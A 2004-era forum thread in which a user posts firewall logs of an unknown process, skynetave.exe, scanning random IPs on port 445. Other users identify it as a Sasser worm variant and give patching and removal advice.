ok i found that process skynetave.exe running on my system, no idea where it comes from! my firewall says it tries to access random IPs like crazy, on port 445 i think!
can anyone try to analyze this thing?

Sounds like a new lsass.exe RPC worm to me. Go to windows update and patch your computer. After you've done this, install a good AV and remove the thing.

see thats the problem...ive been patched all the time, my AV doenst pick it up either!
its pretty strange though that it tries connecting all those IPs...
I also treid the sasser fixtool, nothing found!

here an extract from my firewalls log:

ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (17.241.91.85).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.21.248).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.222.183.127).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.72.23).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (86.133.116.59).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.73.151.249).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (53.147.40.52).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (244.19.241.31).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.234.196).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.165.163.151).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (191.167.186.38).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.31.102).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (56.101.23.212).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (252.38.213.174).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.29.70.145).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (175.120.253.21).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.68.136).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.143.102).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.208.207).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (70.67.90.9).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.26.153).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.50.182.159).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.73.164).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (239.45.48.75).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.187.239).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (123.30.13.141).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.230.23).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (68.88.113.17).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (124.35.118.214).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.11.250.195).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (8.200.69.141).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (73.106.106.55).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (198.247.91.243).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (133.172.200.216).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (169.254.12.247).,N/A,N/A
ACCESS,2004/05/03,13:23:18 +2:00 GMT,skynetave.exe was blocked from connecting to the Internet (84.195.10.105).,N/A,N/A

look at the times, and the random(?) IPs!

i havent looked at the file, but looking at ur log it aint an ordinary scanner...if ur AV doesnt pick it up, update ur AV. It could also be a modded version of the worm tho.

let me guess .. your ip is somewhere within this range 169.254.xxx.xxx?
this is a new/hexed version of the lsass worm

first it sends a icmp echo request to random ips and trys to exploit them afterwards.

look into your registry I'm sure the worm dropped something there

I-Worm/Sasser.D.exe VIRUS if you are still unsure. and get yourself some AV quick like.



Rich

no the 169* range is only a local network device of mine!
i checked the registry but didnt find anything....

i wonder if someone could reverse engeneer that file of something!
@kingvandal
thx, where did u get that info? i use norton AV and i only updated today!

run qfcheck


W2K :
http://www.microsoft.com/downloads/details...6A-1BBF6E8BA288


XP:
http://www.microsoft.com/downloads/details...2A-BFAB8CFCCC03


This will show you if your patches are ACTUALLY installed .... (this one actually checks files, not like windows update site that only checks registry keys)

Could it be the NETSKY worm, or is Sasser the same thing.

nah its not netsky, i checked my pc with the netsky fixtool and nothing found...
but the sasser fixtool wont find that file either

This is "SkynetSasserVersionWithPingFast" (one of many strings copped from running worm code in VM environment).

Still digging, but it looks and acts just like sasser....e.g:

(more strings)

AVG, you know the free av scanner. I have not tested it yet on NOD32, later tonight though :-)

Rich

k, looks pretty sasser like i guess!
thx for all the great posts guys!

@EoS
Yup, your absoloutley right. It is for sure some kind of variant for Sasser. Sasser only uses port 445(at least only the variants that I have tested) It just simply scans random IPs using your computer as a host, then it exploits tries to get in and ... well.. the process continues its a worm. Install the patch from microsoft and use that quick and fast scanner at the bottom of the page. Disable system restore, get the fix tool from Here. Read up on it there too if you'd like, possibly run that scanner in safe mode too. Then just run some more online scans to be sure that its gone. Good luck.